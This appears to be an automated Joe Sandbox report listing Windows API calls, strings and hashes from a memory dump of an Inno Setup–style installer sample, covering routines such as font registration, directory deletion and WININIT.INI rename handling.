                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                        • String ID: Deleting Uninstall data files.
                                                                                        • API String ID: 1570157960-2568741658
                                                                                        • Opcode ID: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                        • Instruction ID: caddedc05ae4add9971b90b84c259ce0cd5246952d50e779d54ebc968ffbf915
                                                                                        • Opcode Fuzzy Hash: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                        • Instruction Fuzzy Hash: 73216170204250BFEB10EB6ABC82B2637A8DB54728F53453BB501961D6DA7CAC448A6D
                                                                                        APIs
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9,?,?,?,?,00000000), ref: 00470263
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9), ref: 0047027A
                                                                                        • AddFontResourceA.GDI32(00000000), ref: 00470297
                                                                                        • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004702AB
                                                                                        Strings
                                                                                        • Failed to open Fonts registry key., xrefs: 00470281
                                                                                        • AddFontResource, xrefs: 004702B5
                                                                                        • Failed to set value in Fonts registry key., xrefs: 0047026C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                        • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                        • API String ID: 955540645-649663873
                                                                                        • Opcode ID: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                        • Instruction ID: 122e39bb1ea2b43e4c2a7da55aa69ddad999e5e54c07bca5f4119535fc7344d3
                                                                                        • Opcode Fuzzy Hash: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                        • Instruction Fuzzy Hash: 6921E271741204BBDB10EAA68C46FAE67AC9B14704F208477B904EB3C3DA7C9E01866D
                                                                                        APIs
                                                                                          • Part of subcall function 00416410: GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                          • Part of subcall function 00416410: UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                          • Part of subcall function 00416410: RegisterClassA.USER32(?), ref: 004164CE
                                                                                        • GetVersion.KERNEL32 ref: 00462E60
                                                                                        • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462E9E
                                                                                        • SHGetFileInfo.SHELL32(00462F3C,00000000,?,00000160,00004011), ref: 00462EBB
                                                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 00462ED9
                                                                                        • SetCursor.USER32(00000000,00000000,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462EDF
                                                                                        • SetCursor.USER32(?,00462F1F,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462F12
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                        • String ID: Explorer
                                                                                        • API String ID: 2594429197-512347832
                                                                                        • Opcode ID: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                        • Instruction ID: b0f6820fd5a5ea072646c086af9eca81c98a3cd1ffd9b7ca0f87214cf94a4ba1
                                                                                        • Opcode Fuzzy Hash: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                        • Instruction Fuzzy Hash: CD21E7307403047AEB15BB759D47B9A3798DB09708F4004BFFA05EA1C3EEBD9901966D
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                        • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                        • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8), ref: 004783CC
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,02112BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                                        • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                        • API String ID: 2704155762-2318956294
                                                                                        • Opcode ID: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                                                        • Instruction ID: 2a72e966618face2f1bd82d2a524167157479a72732682c44667b4342ad9b4bf
                                                                                        • Opcode Fuzzy Hash: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                                                        • Instruction Fuzzy Hash: 370180A07C070536E520316A4C8AFBB654C8B50769F14863FBA1DFA2D3FDED9D06016E
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(00000000,00459F8E,?,00000000,00000000,00000000,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 00459ED2
                                                                                          • Part of subcall function 004543F4: FindClose.KERNEL32(000000FF,004544EA), ref: 004544D9
                                                                                        Strings
                                                                                        • Deleting directory: %s, xrefs: 00459E5B
                                                                                        • Failed to delete directory (%d). Will retry later., xrefs: 00459EEB
                                                                                        • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459F47
                                                                                        • Failed to delete directory (%d)., xrefs: 00459F68
                                                                                        • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459EAC
                                                                                        • Stripped read-only attribute., xrefs: 00459E94
                                                                                        • Failed to strip read-only attribute., xrefs: 00459EA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseErrorFindLast
                                                                                        • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                        • API String ID: 754982922-1448842058
                                                                                        • Opcode ID: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                                                        • Instruction ID: b8d9b7298ea7c3337bda5d500217c07e27fbd6b384233f4239b27a523d6d10d0
                                                                                        • Opcode Fuzzy Hash: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                                                        • Instruction Fuzzy Hash: 1841A331A04208CACB10EB69C8413AEB6A55F4530AF54897BAC01D73D3CB7C8E0DC75E
                                                                                        APIs
                                                                                        • GetCapture.USER32 ref: 00422EA4
                                                                                        • GetCapture.USER32 ref: 00422EB3
                                                                                        • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB9
                                                                                        • ReleaseCapture.USER32 ref: 00422EBE
                                                                                        • GetActiveWindow.USER32 ref: 00422ECD
                                                                                        • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F4C
                                                                                        • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FB0
                                                                                        • GetActiveWindow.USER32 ref: 00422FBF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                        • String ID:
                                                                                        • API String ID: 862346643-0
                                                                                        • Opcode ID: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                        • Instruction ID: c6261992695b47722d84ffa44129b55dc5b2a4dad2f70b0012283783c1c7b094
                                                                                        • Opcode Fuzzy Hash: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                        • Instruction Fuzzy Hash: 24417230B00245AFDB10EB69DA86B9E77F1EF44304F5540BAF404AB2A2D778AE40DB49
                                                                                        APIs
                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 0042F2BA
                                                                                        • GetWindowLongA.USER32(?,000000EC), ref: 0042F2D1
                                                                                        • GetActiveWindow.USER32 ref: 0042F2DA
                                                                                        • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F307
                                                                                        • SetActiveWindow.USER32(?,0042F437,00000000,?), ref: 0042F328
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ActiveLong$Message
                                                                                        • String ID:
                                                                                        • API String ID: 2785966331-0
                                                                                        • Opcode ID: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                        • Instruction ID: ac844ef734d24c76dc9aa96f201b13a865b129e9c1b137beabd8cb6517960092
                                                                                        • Opcode Fuzzy Hash: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                        • Instruction Fuzzy Hash: F931D271A00254AFEB01EFA5DD52E6EBBB8EB09304F9144BAF804E3291D73C9D10CB58
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 0042948A
                                                                                        • GetTextMetricsA.GDI32(00000000), ref: 00429493
                                                                                          • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004294A2
                                                                                        • GetTextMetricsA.GDI32(00000000,?), ref: 004294AF
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004294B6
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 004294BE
                                                                                        • GetSystemMetrics.USER32(00000006), ref: 004294E3
                                                                                        • GetSystemMetrics.USER32(00000006), ref: 004294FD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
                                                                                        • String ID:
                                                                                        • API String ID: 1583807278-0
                                                                                        • Opcode ID: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                                                        • Instruction ID: 8a5b62ad3b2811282b00f4aa11bc4c2c065e9b9ae855548013837f5c18493421
                                                                                        • Opcode Fuzzy Hash: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                                                        • Instruction Fuzzy Hash: 0F01C4A17087103BE321767A9CC6F6F65C8DB44358F84043BF686D63D3D96C9C41866A
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 0041DE27
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041DE31
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0041DE3E
                                                                                        • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE4D
                                                                                        • GetStockObject.GDI32(00000007), ref: 0041DE5B
                                                                                        • GetStockObject.GDI32(00000005), ref: 0041DE67
                                                                                        • GetStockObject.GDI32(0000000D), ref: 0041DE73
                                                                                        • LoadIconA.USER32(00000000,00007F00), ref: 0041DE84
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectStock$CapsDeviceIconLoadRelease
                                                                                        • String ID:
                                                                                        • API String ID: 225703358-0
                                                                                        • Opcode ID: cf3de45f10179e040e4bf754cd3e00afbbff0486b0448c288d4be5e1939ebdb6
                                                                                        • Instruction ID: 282f56568f1177e4dad385ec7f61a974d29090d827cf1f87eb40c920fa9ca7e8
                                                                                        • Opcode Fuzzy Hash: cf3de45f10179e040e4bf754cd3e00afbbff0486b0448c288d4be5e1939ebdb6
                                                                                        • Instruction Fuzzy Hash: 4C1142706457015EE340BFA66E52B6A36A4D725708F40413FF609AF3D1D77A2C448B9E
                                                                                        APIs
                                                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 00463344
                                                                                        • SetCursor.USER32(00000000,00000000,00007F02,00000000,004633D9), ref: 0046334A
                                                                                        • SetCursor.USER32(?,004633C1,00007F02,00000000,004633D9), ref: 004633B4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$Load
                                                                                        • String ID: $ $Internal error: Item already expanding
                                                                                        • API String ID: 1675784387-1948079669
                                                                                        • Opcode ID: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                                                        • Instruction ID: e4e85f4aa3fa623d7d3a169fbc538aa22306e9421cedfdc69a3031d12d347dae
                                                                                        • Opcode Fuzzy Hash: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                                                        • Instruction Fuzzy Hash: 4CB18270604284EFDB11DF29C545B9ABBF1BF04305F1484AAE8469B792DB78EE44CB4A
                                                                                        APIs
                                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfileStringWrite
                                                                                        • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                        • API String ID: 390214022-3304407042
                                                                                        • Opcode ID: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                                                        • Instruction ID: 4c4b1d7f09994941c57eaafc4db68242d6a3f6c21ecd3f2b5b8f846a746055a2
                                                                                        • Opcode Fuzzy Hash: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                                                        • Instruction Fuzzy Hash: 40911434E002099BDB01EFA5D842BDEB7F5AF4874AF608466E90077392D7786E49CB58
                                                                                        APIs
                                                                                        • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476CA9
                                                                                        • SetWindowLongW.USER32(00000000,000000FC,00476C04), ref: 00476CD0
                                                                                        • GetACP.KERNEL32(00000000,00476EE8,?,00000000,00476F12), ref: 00476D0D
                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476D53
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassInfoLongMessageSendWindow
                                                                                        • String ID: COMBOBOX$Inno Setup: Language
                                                                                        • API String ID: 3391662889-4234151509
                                                                                        • Opcode ID: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                                                        • Instruction ID: b13fa11fcbd9abdf7db93726dac51e4442bd67f198c8610d2c1064f44be53319
                                                                                        • Opcode Fuzzy Hash: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                                                        • Instruction Fuzzy Hash: 46812C346006059FDB10DF69D985AEAB7F2FB09304F15C1BAE808EB762D778AD41CB58
                                                                                        APIs
                                                                                        • GetSystemDefaultLCID.KERNEL32(00000000,00408968,?,?,?,?,00000000,00000000,00000000,?,0040996F,00000000,00409982), ref: 0040873A
                                                                                          • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                          • Part of subcall function 004085B4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087B6,?,?,?,00000000,00408968), ref: 004085C7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoLocale$DefaultSystem
                                                                                        • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                        • API String ID: 1044490935-665933166
                                                                                        • Opcode ID: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                                        • Instruction ID: 5c6fde8006682913ecab3173e7335377554a92ac61a87523d81808753b4ec1a9
                                                                                        • Opcode Fuzzy Hash: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                                        • Instruction Fuzzy Hash: 7D516C24B00108ABDB01FBA69E4169EB7A9DB94308F50C07FA181BB3C3CE3DDA05975D
                                                                                        APIs
                                                                                        • GetVersion.KERNEL32(00000000,004118F9), ref: 0041178C
                                                                                        • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041184A
                                                                                          • Part of subcall function 00411AAC: CreatePopupMenu.USER32 ref: 00411AC6
                                                                                        • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118D6
                                                                                          • Part of subcall function 00411AAC: CreateMenu.USER32 ref: 00411AD0
                                                                                        • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118BD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                        • String ID: ,$?
                                                                                        • API String ID: 2359071979-2308483597
                                                                                        • Opcode ID: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                                                        • Instruction ID: ecf66c9774bccec907b621c371347452b74b7622051e058d8a4a73451c3e974f
                                                                                        • Opcode Fuzzy Hash: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                                                        • Instruction Fuzzy Hash: D7510674A00245ABDB10EF6ADC816EA7BF9AF09304B11857BF904E73A6D738DD41CB58
                                                                                        APIs
                                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 0041BF28
                                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 0041BF37
                                                                                        • GetBitmapBits.GDI32(?,?,?), ref: 0041BF88
                                                                                        • GetBitmapBits.GDI32(?,?,?), ref: 0041BF96
                                                                                        • DeleteObject.GDI32(?), ref: 0041BF9F
